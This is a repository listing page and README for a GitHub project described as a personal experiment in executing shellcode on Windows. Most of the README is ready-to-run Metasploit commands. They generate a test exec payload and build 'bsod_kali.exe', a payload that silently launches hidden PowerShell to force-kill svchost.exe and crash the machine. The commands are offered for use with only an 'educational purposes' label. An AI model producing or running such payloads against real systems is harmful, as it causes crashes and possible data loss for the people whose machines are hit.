https://github.com/zalexanninev15/shellcodeex
My personal experiment on executing shellcode on Windows.
https://github.com/zalexanninev15/shellcodeex
bsod shellcode shellcode-loader
Last synced: 10 months ago
JSON representation
My personal experiment on executing shellcode on Windows.
- Host: GitHub
- URL: https://github.com/zalexanninev15/shellcodeex
- Owner: Zalexanninev15
- License: gpl-3.0
- Created: 2024-11-30T15:33:03.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-12-03T11:29:37.000Z (over 1 year ago)
- Last Synced: 2025-06-12T20:32:12.904Z (10 months ago)
- Topics: bsod, shellcode, shellcode-loader
- Language: C
- Homepage:
- Size: 150 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# ShellCodeEx
[](https://github.com/Zalexanninev15/ShellCodeEx)
[](https://github.com/Zalexanninev15/ShellCodeEx)
[](https://dotnet.microsoft.com/download/dotnet/6.0)
[](https://github.com/Zalexanninev15/SharkRemoteV4)
[](https://github.com/Zalexanninev15/ShellCodeEx/releases/latest)
[](https://github.com/Zalexanninev15/ShellCodeEx/releases)
[](https://github.com/Zalexanninev15/ShellCodeEx/commits/main)
[](https://github.com/Zalexanninev15/ShellCodeEx/stargazers)
[](https://github.com/Zalexanninev15/ShellCodeEx/network/members)
[](LICENSE)
[](https://z15.neocities.org/donate)
## Description
My personal experiment on executing shellcode on Windows. For educational purposes!!!
## Kali Linux commands for generate shellcode
Install Metasploit Framework:
```bash
sudo apt install metasploit-framework -y
```
### Test shellcode
```bash
msfconsole -x "use payload/windows/x64/exec; set CMD 'powershell -c \"ls\" && pause'; generate -f ps1; exit"
```
### Generate BSOD (building an executable file)
```bash
msfvenom --platform windows --arch x64 -p windows/x64/exec CMD='cmd.exe /c start /min powershell -Command "Start-Process cmd -ArgumentList \"/c taskkill /F /IM svchost.exe\" -WindowStyle Hidden"' -b '\x00\x0A\x0D' -f exe -o bsod_kali.exe
```
### Generate BSOD
```bash
msfconsole
> use payload/windows/x64/exec
> set CMD cmd.exe /c start /min powershell -Command \"Start-Process cmd -ArgumentList \\\"/c taskkill /F /IM svchost.exe\\\" -WindowStyle Hidden\"
> exit
```